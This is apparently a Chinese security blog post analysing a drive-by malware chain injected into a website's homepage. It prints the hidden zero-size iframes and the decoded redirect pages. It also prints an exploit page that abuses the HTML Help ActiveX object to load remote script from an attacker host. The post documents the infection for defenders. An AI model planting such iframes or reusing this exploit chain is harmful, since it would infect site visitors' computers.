endurer 原創
網站首頁被插入惡意代碼:
<iframe src='hxXP://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveQQ.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
hxxp://www.***hyap98.com/123/wawa.htm的部分內容經過escape()加密��,upescape()后為:
<Html>
<HEAD>
<SCRipT LANGUAGE="javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/123/music.htm的部分內容經過escape()加密��,upescape()后為:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/joke.htm的內容為(已去掉開頭的多個空格):
<center><font color=red>對不起,您訪問的頁面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
此網頁檢查IE版本����,并打開相應的網頁windows.htm�����、wint.htm或w98.htm�����。
hxxp://www.***hyap98.com/rx/windows.htm的部分內容經過escape()加密���,upescape()并去掉多余的起始空格后為:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="http://www.qqread.com/java/young.gif"></SCRIPT><SCRIPT language=VScript src="young.CSS"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
